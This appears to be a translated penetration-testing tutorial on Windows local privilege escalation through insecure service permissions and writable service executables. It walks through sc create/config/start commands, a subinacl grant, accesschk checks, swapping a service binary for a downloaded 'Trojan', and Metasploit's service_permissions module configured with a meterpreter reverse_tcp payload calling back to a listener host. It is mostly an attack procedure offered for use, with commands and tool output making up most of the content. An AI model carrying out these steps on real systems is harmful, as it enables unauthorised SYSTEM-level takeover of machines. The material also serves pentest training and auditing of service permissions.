Some of the words
The official introduction
https://docs.microsoft.com/en-us/dotnet/framework/windows-services/introduction-to-windows-service-applications
The system or user account must be connected to services to run properly. The following built-in system accounts are usually used for operating services:
LocalService
NetworkService
LocalSystem
When a service has createservice installed, the SCM creates a security descriptor for the service object, and the default security descriptor for the service object grants the following permissions
data:image/s3,"s3://crabby-images/c2fd3/c2fd3c98b1c315ba3d2fd3f1440ea11ee1a86702" alt="image-20211107191958116"
Actual use
Focus on two types of insecure configuration points:
1.Insecure profile permissions: Users with low permissions can update service Settings, such as executables when the service is running
2.Insecure service executables: Low-privileged users can run their own programs by overwriting the executables of related service runtimes
Insecure profile permissions(PTOC)
Create a new service as follows
sc create 3attack binPath="C:\Users\Public\Documents\data\1.exe"
data:image/s3,"s3://crabby-images/b2645/b2645b72453e22a9814bf2d9c3e4069bcb1b5026" alt="image-20211107192753754"
Assign permissions to users using subinACL progress
subinacl.exe /service 3attack /grant=y=PTOC
data:image/s3,"s3://crabby-images/bb8df/bb8dfc3c5e5e365d74d2d367f8c3def89860ed0f" alt="image-20211107193040378"
sc
A common user obtains system rights and tries to query service information
data:image/s3,"s3://crabby-images/94c28/94c28b35061e9710ad0188a579e26e30ef6688fe" alt="image-20211107193539512"
View the target service 3attack information. The service account type is Localsystem and has permission to start and stop
data:image/s3,"s3://crabby-images/e25ac/e25ac8698fc0dd44142b3a2938b855c9ab065a80" alt="image-20211107193634940"
accesschk64
Look for SERVICE ALL ACCESS or SERVICE CHANGE CONFIG permissions, which allow an attacker to CHANGE service-related configurations
data:image/s3,"s3://crabby-images/6c6a8/6c6a8a114ef0927996edbe4a4af2f3c64c4ffe63" alt="image-20211107194521311"
Using the details
Download Trojan files
data:image/s3,"s3://crabby-images/99af7/99af7bc64388e963af0d7c739e91769b61acd6a3" alt="image-20211107194919724"
Modify the service configuration and start the service
sc config 3attack binPath= "C:\Users\y\13340.exe"
sc start 13340
data:image/s3,"s3://crabby-images/6224b/6224bc0bc863894b5912cf03f7c4196f759f9c2f" alt="image-20211107195022083"
The permissions are as follows
data:image/s3,"s3://crabby-images/56246/56246ad0983f4e121d56c7890b371695aba111b4" alt="image-20211107195057181"
Insecure service executables(PTO)
Using the details
Directly modify the executable program executed by the service, remotely download our Trojan file and rename it the executable program name in the service
data:image/s3,"s3://crabby-images/37941/3794128f48bda6626c9a0530825a76a06e5b7714" alt="image-20211107200325197"
data:image/s3,"s3://crabby-images/c8f9b/c8f9b7f16bc538b6f88e7863c3c902564f69d430" alt="image-20211107200346789"
Start the service and go online as follows
data:image/s3,"s3://crabby-images/409cf/409cf985c58476cb3dccbeb95b23b0cfba5f142c" alt="image-20211107200428741"
MSF direct utilization
use exploit/windows/local/service_permissions
msf6 exploit(windows/local/service_permissions) > options
Module options (exploit/windows/local/service_permissions):
Name Current Setting Required Description
---- --------------- -------- -----------
AGGRESSIVE false no Exploit as many services as possible (dangerous)
SESSION 5 yes The session to run this module on.
TIMEOUT 10 yes Timeout for WMI command in seconds
Payload options (windows/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.122.1 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
data:image/s3,"s3://crabby-images/2c3b3/2c3b3ba142ced07148e393bd037868bd6aea2a20" alt="image-20211107200824231"
data:image/s3,"s3://crabby-images/bbd04/bbd04697f50587e6df9355b00b34e274c1eeaceb" alt="image-20211107200837971.png"